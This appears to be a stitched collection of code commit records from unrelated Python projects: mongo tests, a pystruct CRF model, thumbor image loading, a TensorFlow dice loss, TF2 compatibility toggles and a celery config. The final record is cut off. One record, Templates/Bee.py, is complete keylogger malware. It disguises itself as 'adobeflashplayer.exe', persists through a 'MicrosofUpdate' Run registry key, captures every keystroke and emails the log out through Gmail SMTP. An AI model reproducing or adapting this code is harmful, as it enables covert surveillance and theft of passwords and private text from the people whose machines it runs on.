    def test_get_document_cls(self, mock_get):
        mock_get.return_value = 'foo'
        assert docs.get_document_cls('MyModel') == 'foo'
        mock_get.assert_called_once_with('MyModel')

    @patch.object(docs.mongo.document, 'get_document')
    def test_get_document_cls_error(self, mock_get):
        mock_get.side_effect = Exception()
        with pytest.raises(ValueError) as ex:
            docs.get_document_cls('MyModel')
        mock_get.assert_called_once_with('MyModel')
        assert str(ex.value) == '`MyModel` does not exist in mongo db'

    def test_process_lists(self):
        test_dict = dictset(
            id__in='1, 2, 3',
            name__all='foo',
            other__arg='4',
            yet_other_arg=5,
        )
        result_dict = docs.process_lists(test_dict)
        expected = dictset(
            id__in=['1', '2', '3'],
            name__all=['foo'],
            other__arg='4',
            yet_other_arg=5,
        )
        assert result_dict == expected

    def test_process_bools(self):
        test_dict = dictset(
            complete__bool='false',
            other_arg=5,
        )
        result_dict = docs.process_bools(test_dict)
        assert result_dict == dictset(complete=False, other_arg=5)


class TestBaseMixin(object):

    def test_id_field(self):
        class MyModel(docs.BaseDocument):
            my_id = fields.IdField()
            name = fields.StringField()

        assert MyModel.id_field() == 'my_id'

    def test_check_fields_allowed_not_existing_field(self):
        class MyModel(docs.BaseDocument):
            name = fields.StringField()

        with pytest.raises(JHTTPBadRequest) as ex:
            MyModel.check_fields_allowed(('id__in', 'name', 'description'))
        assert "'MyModel' object does not have fields" in str(ex.value)
        assert 'description' in str(ex.value)
        assert 'name' not in str(ex.value)

    def test_check_fields_allowed(self):
        class MyModel(docs.BaseDocument):
            name = fields.StringField()

        try:
            MyModel.check_fields_allowed(('id__in', 'name'))
        except JHTTPBadRequest:
            raise Exception('Unexpected JHTTPBadRequest exception raised')

    def test_check_fields_allowed_dymanic_doc(self):
        class MyModel(docs.BaseMixin, mongo.DynamicDocument):
            name = fields.StringField()

        try:
            MyModel.check_fields_allowed(('id__in', 'name', 'description'))
        except JHTTPBadRequest:
            raise Exception('Unexpected JHTTPBadRequest exception raised')

    def test_filter_fields(self):
        class MyModel(docs.BaseDocument):
            name = fields.StringField()

        params = MyModel.filter_fields(dictset(
            description='nice',
            name='regular name',
            id__in__here=[1, 2, 3],
        ))
        assert params == dictset(
            name='regular name',
            id__in__here=[1, 2, 3],
        )

    def test_apply_fields(self):
        query_set = Mock()
        _fields = ['name', 'id', '-title']
        docs.BaseDocument.apply_fields(query_set, _fields)
        query_set.only.assert_called_once_with('name', 'id')
        query_set.only().exclude.assert_called_once_with('title')

    def test_apply_sort(self):
        query_set = Mock()
        docs.BaseDocument.apply_sort(query_set, ['name', 'id'])
        query_set.order_by.assert_called_once_with('name', 'id')

    def test_apply_sort_no_sort(self):
        query_set = Mock()
        docs.BaseDocument.apply_sort(query_set, [])
        assert not query_set.order_by.called

    def test_count(self):
        query_set = Mock()
        docs.BaseDocument.count(query_set)
        query_set.count.assert_called_once_with(
            with_limit_and_skip=True)
|
Python
| 0.000209
|
@@ -1782,32 +1782,48 @@
lds.StringField(
+primary_key=True
)%0A%0A asser
@@ -1847,21 +1847,20 @@
d() == '
-my_id
+name
'%0A%0A d
|
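Decoded and applied to the old test (whitespace approximate), the hunks make `name` the primary key and update the expectation accordingly:

```python
    def test_id_field(self):
        class MyModel(docs.BaseDocument):
            my_id = fields.IdField()
            name = fields.StringField(primary_key=True)

        assert MyModel.id_field() == 'name'
```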
776c8fd802385ef4294112e76365df6bdf93476a
|
Update Bee.py
|
Templates/Bee.py
|
Templates/Bee.py
|
import pythoncom
import pyHook
from os import path
from sys import exit
from sys import argv
from shutil import copy
import threading
import urllib,urllib2
import smtplib
import datetime,time
import win32com.client
import win32event, win32api, winerror
from _winreg import *
mutex = win32event.CreateMutex(None, 1, 'N0tAs519ns')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
print "err"
exit(0)
x=''
data=''
count=0
dir = "C:\\Users\\Public\\Libraries\\adobeflashplayer.exe"
def startup():
copy(argv[0],dir)
aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
SetValueEx(aKey,"MicrosofUpdate",0, REG_SZ, dir)
if path.isfile(dir) == False:
startup()
class TimerClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.event = threading.Event()
def run(self):
while not self.event.is_set():
global data
if len(data)>50:
ts = datetime.datetime.now()
SERVER = "smtp.gmail.com"
PORT = 587
USER = EEMAIL
PASS = EPASS
FROM = USER
TO = [USER]
SUBJECT = "B33: "+str(ts)
MESSAGE = data
message = """\
From: %s
To: %s
Subject: %s
%s
""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
try:
server = smtplib.SMTP()
server.connect(SERVER,PORT)
server.starttls()
server.login(USER,PASS)
server.sendmail(FROM, TO, message)
data=''
server.quit()
except Exception as e:
print e
self.event.wait(120)
def main():
global x
em4=TimerClass()
em4.start()
return True
if __name__ == '__main__':
main()
def pushing(event):
global x,data
if event.Ascii==13:
e4Ch=' [ENTER] '
elif event.Ascii==8:
e4Ch=' [BACKSPACE] '
elif (event.Ascii == 162 or event.Ascii == 163):
e4Ch = ' [CTRL] '
elif (event.Ascii == 164 or event.Ascii == 165):
e4Ch = ' [ALT] '
elif (event.Ascii == 160 or event.Ascii == 161):
e4Ch = ' [SHIFT] '
elif (event.Ascii == 46):
e4Ch = ' [DELETE] '
elif (event.Ascii == 32):
e4Ch = ' [SPACE] '
elif (event.Ascii == 27):
e4Ch = ' [ESC] '
elif (event.Ascii == 9):
e4Ch = ' [TAB] '
elif (event.Ascii == 20):
e4Ch = ' [CAPSLOCK] '
elif (event.Ascii == 38):
e4Ch = ' [UP] '
elif (event.Ascii == 40):
e4Ch = ' [DOWN] '
elif (event.Ascii == 37):
e4Ch = ' [LEFT] '
elif (event.Ascii == 39):
e4Ch = ' [RIGHT] '
elif (event.Ascii == 91):
e4Ch = ' [SUPER] '
else:
e4Ch=chr(event.Ascii)
data=data+e4Ch
obj = pyHook.HookManager()
obj.KeyDown = pushing
obj.HookKeyboard()
pythoncom.PumpMessages()
|
Python
| 0.000009
|
@@ -9,23 +9,17 @@
ythoncom
-%0Aimport
+,
pyHook%0A
@@ -63,53 +63,8 @@
xit%0A
-from sys import argv%0Afrom shutil import copy%0A
impo
@@ -216,16 +216,41 @@
import *
+%0Aimport shutil%0Aimport sys
%0A%0Amutex
@@ -293,17 +293,16 @@
0tAs519n
-s
')%0Aif wi
@@ -507,13 +507,24 @@
+shutil.
copy(
+sys.
argv
|
c129fc28da31fc8fa1ebd3ac75792b8ccad245c8
|
fix better warning
|
pystruct/models/edge_feature_graph_crf.py
|
pystruct/models/edge_feature_graph_crf.py
|
import numpy as np

from .graph_crf import GraphCRF


class EdgeFeatureGraphCRF(GraphCRF):
    """Pairwise CRF with features/strength associated to each edge.

    Pairwise potentials are asymmetric and shared over all edges.
    They are weighted by edge-specific features, though.
    This allows for contrast sensitive potentials or directional potentials
    (using a {-1, +1} encoding of the direction for example).

    More complicated interactions are also possible, of course.

    Node features and edge features are given as a tuple of shape (n_nodes,
    n_features) and (n_edges, n_edge_features) respectively.

    An instance ``x`` is represented as a tuple ``(node_features, edges,
    edge_features)`` where edges is an array of shape (n_edges, 2),
    representing the graph.

    Labels ``y`` are given as array of shape (n_features)

    Parameters
    ----------
    n_states : int, default=2
        Number of states for all variables.

    n_features : int, default=None
        Number of features per node. None means n_states.

    n_edge_features : int, default=1
        Number of features per edge.

    inference_method : string, default="qpbo"
        Function to call to do inference and loss-augmented inference.
        Possible values are:

            - 'qpbo' for QPBO + alpha expansion.
            - 'dai' for LibDAI bindings (which has another parameter).
            - 'lp' for Linear Programming relaxation using GLPK.
            - 'ad3' for AD3 dual decomposition.

    class_weight : None, or array-like
        Class weights. If an array-like is passed, it must have length
        n_classes. None means equal class weights.

    symmetric_edge_features : None or list
        Indices of edge features that are forced to be symmetric.
        Often the direction of the edge has no immediate meaning.

    antisymmetric_edge_features : None or list
        Indices of edge features that are forced to be anti-symmetric.
    """
    def __init__(self, n_states=2, n_features=None, n_edge_features=1,
                 inference_method='qpbo', class_weight=None,
                 symmetric_edge_features=None,
                 antisymmetric_edge_features=None):
        GraphCRF.__init__(self, n_states, n_features, inference_method,
                          class_weight=class_weight)
        self.n_edge_features = n_edge_features
        self.size_psi = (n_states * self.n_features
                         + self.n_edge_features
                         * n_states ** 2)
        if symmetric_edge_features is None:
            symmetric_edge_features = []
        if antisymmetric_edge_features is None:
            antisymmetric_edge_features = []

        if not set(symmetric_edge_features).isdisjoint(
                antisymmetric_edge_features):
            raise ValueError("symmetric_edge_features and "
                             " antisymmetric_edge_features share an entry."
                             " That doesn't make any sense.")

        self.symmetric_edge_features = symmetric_edge_features
        self.antisymmetric_edge_features = antisymmetric_edge_features

    def __repr__(self):
        return ("%s(n_states: %d, inference_method: %s, n_features: %d, "
                "n_edge_features: %d)"
                % (type(self).__name__, self.n_states, self.inference_method,
                   self.n_features, self.n_edge_features))

    def _check_size_x(self, x):
        GraphCRF._check_size_x(self, x)

        _, edges, edge_features = x
        if edges.shape[0] != edge_features.shape[0]:
            raise ValueError("Got %d edges but %d edge features."
                             % (edges.shape[0], edge_features.shape[0]))
        if edge_features.shape[1] != self.n_edge_features:
            raise ValueError("Got edge features of size %d, but expected %d."
                             % (edge_features.shape[1], self.n_edge_features))

    def get_pairwise_potentials(self, x, w):
        """Computes pairwise potentials for x and w.

        Parameters
        ----------
        x : tuple
            Instance Representation.

        w : ndarray, shape=(size_psi,)
            Weight vector for CRF instance.

        Returns
        -------
        pairwise : ndarray, shape=(n_states, n_states)
            Pairwise weights.
        """
        self._check_size_w(w)
        self._check_size_x(x)
        edge_features = x[2]
        pairwise = np.asarray(w[self.n_states * self.n_features:])
        pairwise = pairwise.reshape(self.n_edge_features, -1)
        return np.dot(edge_features, pairwise).reshape(
            edge_features.shape[0], self.n_states, self.n_states)

    def psi(self, x, y):
        """Feature vector associated with instance (x, y).

        Feature representation psi, such that the energy of the configuration
        (x, y) and a weight vector w is given by np.dot(w, psi(x, y)).

        Parameters
        ----------
        x : tuple
            Input representation.

        y : ndarray or tuple
            Either y is an integral ndarray, giving
            a complete labeling for x.
            Or it is the result of a linear programming relaxation. In this
            case, ``y=(unary_marginals, pairwise_marginals)``.

        Returns
        -------
        p : ndarray, shape (size_psi,)
            Feature vector associated with state (x, y).
        """
        self._check_size_x(x)
        features, edges = self.get_features(x), self.get_edges(x)
        n_nodes = features.shape[0]
        edge_features = x[2]

        if isinstance(y, tuple):
            # y is result of relaxation, tuple of unary and pairwise marginals
            unary_marginals, pw = y
        else:
            y = y.reshape(n_nodes)
            gx = np.ogrid[:n_nodes]

            # make one hot encoding
            unary_marginals = np.zeros((n_nodes, self.n_states), dtype=np.int)
            gx = np.ogrid[:n_nodes]
            unary_marginals[gx, y] = 1

            ## pairwise
            pw = [np.outer(unary_marginals[edge[0]].T,
                           unary_marginals[edge[1]]).ravel()
                  for edge in edges]
            pw = np.vstack(pw)

        pw = np.dot(edge_features.T, pw)
        for i in self.symmetric_edge_features:
            pw_ = pw[i].reshape(self.n_states, self.n_states)
            pw[i] = (pw_ + pw_.T).ravel() / 2.

        for i in self.antisymmetric_edge_features:
            pw_ = pw[i].reshape(self.n_states, self.n_states)
            pw[i] = (pw_ - pw_.T).ravel() / 2.

        unaries_acc = np.dot(unary_marginals.T, features)

        psi_vector = np.hstack([unaries_acc.ravel(), pw.ravel()])
        return psi_vector
|
Python
| 0.001163
|
@@ -2692,16 +2692,291 @@
res = %5B%5D
+%0A if np.any(np.hstack(%5Bsymmetric_edge_features,%0A antisymmetric_edge_features%5D) %3E= n_edge_features):%0A raise ValueError(%22Got (anti) symmetric edge feature index that is %22%0A %22larger than n_edge_features.%22)
%0A%0A
|
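Decoded, the hunk adds a bounds check in `__init__` right after the empty-list defaults are filled in, so out-of-range (anti)symmetric feature indices fail fast instead of silently indexing past `pw`:

```python
        if np.any(np.hstack([symmetric_edge_features,
                             antisymmetric_edge_features]) >= n_edge_features):
            raise ValueError("Got (anti) symmetric edge feature index that is "
                             "larger than n_edge_features.")
```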
d07d87ea7f9d62e8274ba1b958d08756d071653a
|
add format detection by magic number
|
thumbor/engines/__init__.py
|
thumbor/engines/__init__.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-

# thumbor imaging service
# https://github.com/globocom/thumbor/wiki

# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com timehome@corp.globo.com


class BaseEngine(object):

    def __init__(self, context):
        self.context = context
        self.image = None
        self.extension = None
        self.source_width = None
        self.source_height = None
        self.icc_profile = None

    def load(self, buffer, extension):
        self.extension = extension
        self.image = self.create_image(buffer)

        if self.source_width is None:
            self.source_width = self.size[0]
        if self.source_height is None:
            self.source_height = self.size[1]

    @property
    def size(self):
        return self.image.size

    def normalize(self):
        width, height = self.size
        self.source_width = width
        self.source_height = height

        if width > self.context.config.MAX_WIDTH or height > self.context.config.MAX_HEIGHT:
            width_diff = width - self.context.config.MAX_WIDTH
            height_diff = height - self.context.config.MAX_HEIGHT
            if self.context.config.MAX_WIDTH and width_diff > height_diff:
                height = self.get_proportional_height(self.context.config.MAX_WIDTH)
                self.resize(self.context.config.MAX_WIDTH, height)
                return True
            elif self.context.config.MAX_HEIGHT and height_diff > width_diff:
                width = self.get_proportional_width(self.context.config.MAX_HEIGHT)
                self.resize(width, self.context.config.MAX_HEIGHT)
                return True
        return False

    def get_proportional_width(self, new_height):
        width, height = self.size
        return round(float(new_height) * width / height, 0)

    def get_proportional_height(self, new_width):
        width, height = self.size
        return round(float(new_width) * height / width, 0)

    def gen_image(self):
        raise NotImplementedError()

    def create_image(self):
        raise NotImplementedError()

    def crop(self):
        raise NotImplementedError()

    def resize(self):
        raise NotImplementedError()

    def focus(self, points):
        pass

    def flip_horizontally(self):
        raise NotImplementedError()

    def flip_vertically(self):
        raise NotImplementedError()

    def read(self, extension, quality):
        raise NotImplementedError()

    def get_image_data(self):
        raise NotImplementedError()

    def set_image_data(self, data):
        raise NotImplementedError()

    def get_image_mode(self):
        """ Possible return values should be: RGB, RBG, GRB, GBR, BRG, BGR, RGBA, AGBR, ... """
        raise NotImplementedError()

    def paste(self):
        raise NotImplementedError()
|
Python
| 0.000001
|
@@ -532,16 +532,271 @@
nsion):%0A
+ #magic number detection%0A if ( buffer%5B:4%5D == 'GIF8'):%0A extension = '.gif'%0A elif ( buffer%5B:8%5D == '%5Cx89PNG%5Cr%5Cn%5Cx1a%5Cn'):%0A extension = '.png'%0A elif ( buffer%5B:2%5D == '%5Cxff%5Cxd8'):%0A extension = '.jpg'%0A%0A
|
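Decoded, the hunk prepends magic-number sniffing to `load()`, overriding the caller-supplied extension when the buffer's leading bytes identify a GIF, PNG, or JPEG (Python 2 byte strings, as in the original file):

```python
    def load(self, buffer, extension):
        # magic number detection
        if buffer[:4] == 'GIF8':
            extension = '.gif'
        elif buffer[:8] == '\x89PNG\r\n\x1a\n':
            extension = '.png'
        elif buffer[:2] == '\xff\xd8':
            extension = '.jpg'

        self.extension = extension
        self.image = self.create_image(buffer)
```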
b277ca357728010c9d763c95cc459540821802c0
|
Update dice loss
|
dataset/models/tf/losses/__init__.py
|
dataset/models/tf/losses/__init__.py
|
""" Contains custom losses """
import tensorflow as tf
from ..layers import flatten
def dice(targets, predictions):
""" Dice coefficient
Parameters
----------
targets : tf.Tensor
tensor with target values
predictions : tf.Tensor
tensor with predicted values
Returns
-------
average loss : tf.Tensor with a single element
"""
e = 1e-6
intersection = flatten(targets * predictions)
loss = -tf.reduce_mean((2. * intersection + e) / (flatten(targets) + flatten(predictions) + e))
return loss
|
Python
| 0
|
@@ -109,16 +109,160 @@
dictions
+, weights=1.0, label_smoothing=0, scope=None,%0A loss_collection=tf.GraphKeys.LOSSES, reduction=tf.losses.Reduction.SUM_BY_NONZERO_WEIGHTS
):%0A %22
@@ -429,21 +429,21 @@
edicted
-value
+logit
s%0A%0A R
@@ -469,138 +469,475 @@
-average loss : tf.Tensor with a single element%0A %22%22%22%0A e = 1e-6%0A intersection = flatten(targets * predictions)%0A los
+Tensor of the same type as targets.%0A If reduction is NONE, this has the same shape as targets; otherwise, it is scalar.%0A %22%22%22%0A e = 1e-6%0A predictions = tf.sigmoid(predictions)%0A axis = tuple(range(1, targets.shape.ndims))%0A%0A if label_smoothing %3E 0:%0A num_classes = targets.shape%5B-1%5D%0A targets = targets * (1 - label_smoothing) + label_smoothing / num_classes%0A%0A intersection = tf.reduce_sum(targets * predictions, axis=axis)%0A target
s =
--
tf.r
@@ -946,13 +946,101 @@
uce_
-mean(
+sum(targets, axis=axis)%0A predictions = tf.reduce_sum(predictions, axis=axis)%0A%0A loss = -
(2.
@@ -1065,24 +1065,16 @@
) /
-(flatten
(targets
) +
@@ -1073,20 +1073,11 @@
gets
-)
+
-flatten(
pred
@@ -1087,14 +1087,105 @@
ions
-)
+ e)
+%0A loss = tf.losses.compute_weighted_loss(loss, weights, scope, loss_collection, reduction
)%0A
|
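Decoded and applied to the old contents, the rewritten loss takes logits, reduces per-sample over all non-batch axes, optionally label-smooths, and defers weighting/reduction to TF1's `tf.losses.compute_weighted_loss`. A reconstruction (whitespace approximate, docstring omitted):

```python
def dice(targets, predictions, weights=1.0, label_smoothing=0, scope=None,
         loss_collection=tf.GraphKeys.LOSSES,
         reduction=tf.losses.Reduction.SUM_BY_NONZERO_WEIGHTS):
    e = 1e-6
    predictions = tf.sigmoid(predictions)
    axis = tuple(range(1, targets.shape.ndims))

    if label_smoothing > 0:
        num_classes = targets.shape[-1]
        targets = targets * (1 - label_smoothing) + label_smoothing / num_classes

    intersection = tf.reduce_sum(targets * predictions, axis=axis)
    targets = tf.reduce_sum(targets, axis=axis)
    predictions = tf.reduce_sum(predictions, axis=axis)

    loss = -(2. * intersection + e) / (targets + predictions + e)
    loss = tf.losses.compute_weighted_loss(loss, weights, scope,
                                           loss_collection, reduction)
    return loss
```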
4c9b47052c2c66671230f33ea84459e02b3b2f06
|
Update Unit_Testing2.py
|
Unit_Testing2.py
|
Unit_Testing2.py
|
from unit_testing import *
import unittest


class UnitTests(unittest.TestCase):

    def setUp(self):
        print('setUp()...')
        self.hash1 = Hash('1234')
        self.hash2 = Hash('1234')
        self.hash3 = Hash('123')
        self.email1 = Email('P@V')

    def test(self):
        print('testing hash...')
        self.assertEqual(self.hash1, self.hash2) #failed
        self.assertNotEqual(self.hash1, self.hash3)
        self.assertRaises(InvalidPassword, Hash, '1')
        print('testing email...')
        self.assertEqual(str(self.email1), 'P@V')
        self.assertRaises(InvalidEmail, Email, 'thing')
        self.assertRaises(InvalidEmail, Email, '@gmail.com') #failed
        print('testing social...')
        self.assertRaises(InvalidSocial, SS, '123456789')
        self.assertRaises(InvalidSocial, SS, '1234-567-89') #failed
        self.assertRaises(InvalidSocial, SS, '-') #failed
        self.assertRaises(InvalidSocial, SS, '1234')

    def tearDown(self):
        print('tearDown()...')
        del self.hash1
        del self.hash2
        del self.hash3
        del self.email1
|
Python
| 0
|
@@ -167,77 +167,8 @@
')%0D%0A
- self.hash2 = Hash('1234')%0D%0A self.hash3 = Hash('123')%0D%0A
@@ -192,19 +192,31 @@
Email('
-P@V
+zmg@verizon.net
')%0D%0A%0D%0A
@@ -314,17 +314,17 @@
elf.hash
-2
+1
) #faile
@@ -366,26 +366,27 @@
.hash1,
-self.hash3
+Hash('123')
)%0D%0A
@@ -431,18 +431,98 @@
Hash, '1
+
')
+ #failed%0D%0A #self.assertEqual(length of Hash for two different passwords)
%0D%0A
@@ -598,11 +598,23 @@
), '
-P@V
+zmg@verizon.net
')%0D%0A
@@ -665,15 +665,20 @@
l, '
-thing')
+@@') #failed
%0D%0A
@@ -1018,18 +1018,27 @@
S, '1234
+-
')
+ #failed
%0D%0A%0D%0A
|
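Decoded, the edits drop `hash2`/`hash3` from `setUp`, switch the sample email to `zmg@verizon.net`, and retarget several assertions, marking the newly failing ones. The start of the updated test would read:

```python
    def setUp(self):
        print('setUp()...')
        self.hash1 = Hash('1234')
        self.email1 = Email('zmg@verizon.net')

    def test(self):
        print('testing hash...')
        self.assertEqual(self.hash1, self.hash1) #failed
        self.assertNotEqual(self.hash1, Hash('123'))
        self.assertRaises(InvalidPassword, Hash, '1 ') #failed
        #self.assertEqual(length of Hash for two different passwords)
        print('testing email...')
        self.assertEqual(str(self.email1), 'zmg@verizon.net')
        self.assertRaises(InvalidEmail, Email, '@@') #failed
```

Note the hunks leave `tearDown` untouched, so its `del self.hash2` / `del self.hash3` would now raise `AttributeError` after this change.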
09a10d7f0b49ec746f2e93d0eb0377bddc92f25f
|
Update builder.py
|
uplink/builder.py
|
uplink/builder.py
|
# Standard library imports
import collections
import functools
import warnings

# Local imports
from uplink import (
    auth as auth_,
    clients,
    converters,
    exceptions,
    helpers,
    hooks,
    interfaces,
    utils,
    types
)
from uplink.converters import keys

__all__ = ["build", "Consumer"]


class RequestPreparer(object):

    def __init__(self, builder):
        self._hooks = list(builder.hooks)
        self._client = builder.client
        self._base_url = str(builder.base_url)
        self._converters = list(builder.converters)
        self._auth = builder.auth

    def _join_uri_with_base(self, uri):
        return utils.urlparse.urljoin(self._base_url, uri)

    def _get_hook_chain(self, contract):
        chain = list(contract.transaction_hooks)
        converter = contract.get_converter(
            keys.CONVERT_FROM_RESPONSE_BODY,
            contract.return_type)
        if converter is not None:
            # Found a converter that can handle the return type.
            chain.append(hooks.ResponseHandler(converter.convert))
        chain.extend(self._hooks)
        return chain

    @staticmethod
    def apply_hooks(chain, request_builder, sender):
        if len(chain) == 1:
            hook = chain[0]
        else:
            hook = hooks.TransactionHookChain(*chain)
        hook.audit_request(request_builder)
        sender.add_callback(hook.handle_response)
        sender.add_error_handler(hook.handle_exception)

    def prepare_request(self, request_builder):
        # TODO: Add tests for this that make sure the client is called?
        # TODO: Rename uri to url
        request_builder.uri = self._join_uri_with_base(request_builder.uri)
        self._auth(request_builder)
        sender = self._client.create_request()
        chain = self._get_hook_chain(request_builder)
        if chain:
            self.apply_hooks(chain, request_builder, sender)
        return sender.send(
            request_builder.method,
            request_builder.uri,
            request_builder.info
        )

    def create_request_builder(self, definition):
        registry = definition.make_converter_registry(self._converters)
        return helpers.RequestBuilder(registry)


class CallFactory(object):
    def __init__(self, request_preparer, request_definition):
        self._request_preparer = request_preparer
        self._request_definition = request_definition

    def __call__(self, *args, **kwargs):
        builder = self._request_preparer.create_request_builder(
            self._request_definition)
        self._request_definition.define_request(builder, args, kwargs)
        return self._request_preparer.prepare_request(builder)


class Builder(interfaces.CallBuilder):
    """The default callable builder."""

    def __init__(self):
        self._base_url = ""
        self._hooks = []
        self._client = clients.get_client()
        self._converters = collections.deque()
        self._converters.append(converters.StandardConverter())
        self._auth = auth_.get_auth()

    @property
    def client(self):
        return self._client

    @client.setter
    def client(self, client):
        if client is not None:
            self._client = clients.get_client(client)

    @property
    def hooks(self):
        return iter(self._hooks)

    def add_hook(self, *hooks_):
        self._hooks.extend(hooks_)

    @property
    def base_url(self):
        return self._base_url

    @base_url.setter
    def base_url(self, base_url):
        self._base_url = base_url

    @property
    def converters(self):
        return iter(self._converters)

    def add_converter(self, *converters_):
        self._converters.extendleft(converters_)

    @property
    def auth(self):
        return self._auth

    @auth.setter
    def auth(self, auth):
        if auth is not None:
            self._auth = auth_.get_auth(auth)

    @utils.memoize()
    def build(self, definition):
        """
        Creates a callable that uses the provided definition to execute
        HTTP requests when invoked.
        """
        return CallFactory(RequestPreparer(self), definition)


class ConsumerMethod(object):
    """
    A wrapper around a :py:class`interfaces.RequestDefinitionBuilder`
    instance bound to a :py:class:`Consumer` subclass, mainly responsible
    for controlling access to the instance.
    """

    def __init__(self, owner_name, attr_name, request_definition_builder):
        self._request_definition_builder = request_definition_builder
        self._owner_name = owner_name
        self._attr_name = attr_name
        self._request_definition = self._build_definition()

    def _build_definition(self):
        try:
            return self._request_definition_builder.build()
        except exceptions.InvalidRequestDefinition as error:
            # TODO: Find a Python 2.7 compatible way to reraise
            raise exceptions.UplinkBuilderError(
                self._owner_name,
                self._attr_name,
                error)

    def __get__(self, instance, owner):
        if instance is None:
            return self._request_definition_builder
        else:
            return instance._builder.build(self._request_definition)


class ConsumerMeta(type):

    @staticmethod
    def _wrap_if_definition(cls_name, key, value):
        if isinstance(value, interfaces.RequestDefinitionBuilder):
            value = ConsumerMethod(cls_name, key, value)
        return value

    @staticmethod
    def _set_init_handler(namespace):
        try:
            init = namespace["__init__"]
        except KeyError:
            pass
        else:
            builder = types.ArgumentAnnotationHandlerBuilder.from_func(init)
            handler = builder.build()

            @functools.wraps(init)
            def new_init(self, *args, **kwargs):
                init(self, *args, **kwargs)
                f = functools.partial(
                    handler.handle_call, args=args, kwargs=kwargs
                )
                hook = hooks.RequestAuditor(f)
                self._builder.add_hook(hook)

            namespace["__init__"] = new_init

    def __new__(mcs, name, bases, namespace):
        mcs._set_init_handler(namespace)

        # Wrap all definition builders with a special descriptor that
        # handles attribute access behavior.
        for key, value in namespace.items():
            namespace[key] = mcs._wrap_if_definition(name, key, value)

        return super(ConsumerMeta, mcs).__new__(mcs, name, bases, namespace)

    def __setattr__(cls, key, value):
        value = cls._wrap_if_definition(cls.__name__, key, value)
        super(ConsumerMeta, cls).__setattr__(key, value)


_Consumer = ConsumerMeta("_Consumer", (), {})


class Consumer(_Consumer):

    def __init__(
            self,
            base_url="",
            client=None,
            converter=(),
            auth=None,
            hook=()
    ):
        self._builder = Builder()
        self._builder.base_url = base_url
        if isinstance(converter, converters.interfaces.ConverterFactory):
            converter = (converter,)
        self._builder.add_converter(*converter)
        if isinstance(hook, hooks.TransactionHook):
            hook = (hook,)
        self._builder.add_hook(*hook)
        self._builder.auth = auth
        self._builder.client = client


def build(service_cls, *args, **kwargs):
    name = service_cls.__name__
    warnings.warn(
        "`uplink.build` is deprecated and will be removed in v1.0.0. "
        "To construct a consumer instance, have `{0}` inherit "
        "`uplink.Consumer` then instantiate (e.g., `{0}(...)`). ".format(name),
        DeprecationWarning
    )
    consumer = type(name, (service_cls, Consumer), dict(service_cls.__dict__))
    return consumer(*args, **kwargs)
|
Python
| 0.000001
|
@@ -1430,20 +1430,24 @@
er.add_e
-rror
+xception
_handler
|
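Decoded, this is a one-symbol rename on the sender API (`add_error_handler` becomes `add_exception_handler`), so `apply_hooks` would end:

```python
        hook.audit_request(request_builder)
        sender.add_callback(hook.handle_response)
        sender.add_exception_handler(hook.handle_exception)
```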
4089730950d6005e257c20e6926000073fd41b33
|
Enable Tensor equality for 2.0
|
tensorflow/python/compat/v2_compat.py
|
tensorflow/python/compat/v2_compat.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Switching v2 features on and off."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

from tensorflow.python import tf2
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import control_flow_v2_toggles
from tensorflow.python.ops import variable_scope
from tensorflow.python.util.tf_export import tf_export


@tf_export(v1=["enable_v2_behavior"])
def enable_v2_behavior():
  """Enables TensorFlow 2.x behaviors.

  This function can be called at the beginning of the program (before `Tensors`,
  `Graphs` or other structures have been created, and before devices have been
  initialized. It switches all global behaviors that are different between
  TensorFlow 1.x and 2.x to behave as intended for 2.x.

  This function is called in the main TensorFlow `__init__.py` file, user should
  not need to call it, except during complex migrations.
  """
  # TF2 behavior is enabled if either 1) enable_v2_behavior() is called or
  # 2) the TF2_BEHAVIOR=1 environment variable is set. In the latter case,
  # the modules below independently check if tf2.enabled().
  tf2.enable()
  ops.enable_eager_execution()
  tensor_shape.enable_v2_tensorshape()  # Also switched by tf2
  variable_scope.enable_resource_variables()

  # Enables TensorArrayV2 and control flow V2.
  control_flow_v2_toggles.enable_control_flow_v2()


@tf_export(v1=["disable_v2_behavior"])
def disable_v2_behavior():
  """Disables TensorFlow 2.x behaviors.

  This function can be called at the beginning of the program (before `Tensors`,
  `Graphs` or other structures have been created, and before devices have been
  initialized. It switches all global behaviors that are different between
  TensorFlow 1.x and 2.x to behave as intended for 1.x.

  User can call this function to disable 2.x behavior during complex migrations.
  """
  tf2.disable()
  ops.disable_eager_execution()
  tensor_shape.disable_v2_tensorshape()  # Also switched by tf2
  variable_scope.disable_resource_variables()

  # Disables TensorArrayV2 and control flow V2.
  control_flow_v2_toggles.disable_control_flow_v2()
|
Python
| 0
|
@@ -2030,24 +2030,55 @@
variables()%0A
+ ops.enable_tensor_equality()%0A
# Enables
@@ -2809,16 +2809,48 @@
ables()%0A
+ ops.disable_tensor_equality()%0A
# Disa
|
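Decoded, the hunks append the tensor-equality toggles right after the resource-variable switches in each function:

```python
  # in enable_v2_behavior():
  variable_scope.enable_resource_variables()
  ops.enable_tensor_equality()

  # in disable_v2_behavior():
  variable_scope.disable_resource_variables()
  ops.disable_tensor_equality()
```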
e39c2e0c3dae39ee380a98a1aa662d14d1a1191e
|
Add new keyfile
|
dexter/config/celeryconfig.py
|
dexter/config/celeryconfig.py
|
from celery.schedules import crontab
# uses AWS creds from the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY env variables
BROKER_URL = 'sqs://'
BROKER_TRANSPORT_OPTIONS = {
'region': 'eu-west-1',
'polling_interval': 15 * 1,
'queue_name_prefix': 'mma-dexter-',
